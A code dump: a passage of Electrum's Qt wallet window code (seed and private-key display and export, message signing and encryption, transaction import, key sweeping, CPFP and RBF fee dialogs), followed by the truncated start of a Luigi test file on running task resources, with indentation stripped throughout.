for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def _rbf_dialog(self, tx: Transaction, func, title, help_text):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, title)
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(help_text))
ok_button = OkButton(d)
warning_label = WWLabel('\n')
warning_label.setStyleSheet(ColorScheme.RED.as_stylesheet())
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
def on_feerate():
fee_rate = feerate_e.get_amount()
warning_text = '\n'
if fee_rate is not None:
try:
new_tx = func(fee_rate)
except Exception as e:
new_tx = None
warning_text = str(e).replace('\n',' ')
else:
new_tx = None
ok_button.setEnabled(new_tx is not None)
warning_label.setText(warning_text)
feerate_e.textChanged.connect(on_feerate)
def on_slider(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
feerate_e.textEdited.connect(fee_slider.deactivate)
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
grid.addWidget(feerate_e, 2, 1)
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addWidget(warning_label)
vbox.addLayout(Buttons(CancelButton(d), ok_button))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = func(new_fee_rate)
except Exception as e:
self.show_error(str(e))
return
new_tx.set_rbf(not is_final)
self.show_transaction(new_tx, tx_desc=tx_label)
def bump_fee_dialog(self, tx: Transaction):
title = _('Bump Fee')
help_text = _("Increase your transaction's fee to improve its position in mempool.")
def func(new_fee_rate):
return self.wallet.bump_fee(
tx=tx,
txid=tx.txid(),
new_fee_rate=new_fee_rate,
coins=self.get_coins())
self._rbf_dialog(tx, func, title, help_text)
def dscancel_dialog(self, tx: Transaction):
title = _('Cancel transaction')
help_text = _(
"Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")
def func(new_fee_rate):
return self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
self._rbf_dialog(tx, func, title, help_text)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
task_running_resources_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import signal
import multiprocessing
from contextlib import contextmanager
from helpers import unittest, RunOnceTask
import luigi
import luigi.server
class ResourceTestTask(RunOnceTask):
param = luigi.Parameter()
reduce_foo = luigi.BoolParameter()
def process_resources(self):
return {"foo": 2}
def run(self):
if self.reduce_foo:
self.decrease_running_resources({"foo": 1})
time.sleep(2)
super(ResourceTestTask, self).run()
class ResourceWrapperTask(RunOnceTask):
reduce_foo = ResourceTestTask.reduce_foo
def requires(self):
return [
ResourceTestTask(param="a", reduce_foo=self.reduce_foo),
ResourceTestTask(param="b"),
]
class LocalRunningResourcesTest(unittest.TestCase):
def test_resource_reduction(self):
# trivial resource reduction on local scheduler
# test the running_task_resources setter and getter
sch = luigi.scheduler.Scheduler(resources={"foo": 2})
with luigi.worker.Worker(scheduler=sch) as w:
task = ResourceTestTask(param="a", reduce_foo=True)
w.add(task)
w.run()
self.assertEqual(sch.get_running_task_resources(task.task_id)["resources"]["foo"], 1)
class ConcurrentRunningResourcesTest(unittest.TestCase):
def setUp(self):
super(ConcurrentRunningResourcesTest, self).setUp()
# run the luigi server in a new process and wait for its startup
self._process = multiprocessing.Process(target=luigi.server.run)
self._process.start()
time.sleep(0.5)
# configure the rpc scheduler, update the foo resource
self.sch = luigi.rpc.RemoteScheduler()
self.sch.update_resource("foo", 3)
def tearDown(self):
super(ConcurrentRunningResourcesTest, self).tearDown()
# graceful server shutdown
self._process.terminate()
self._process.join(timeout=1)
if self._process.is_alive():
os.kill(self._process.pid, signal.SIGKILL)
@contextmanager
def worker(self, scheduler=None, processes=2):
with luigi.worker.Worker(scheduler=scheduler or self.sch, worker_processes=processes) as w:
w._config.wait_interval = 0.2
w._config.check_unfulfilled_deps = False
yield w
@contextmanager
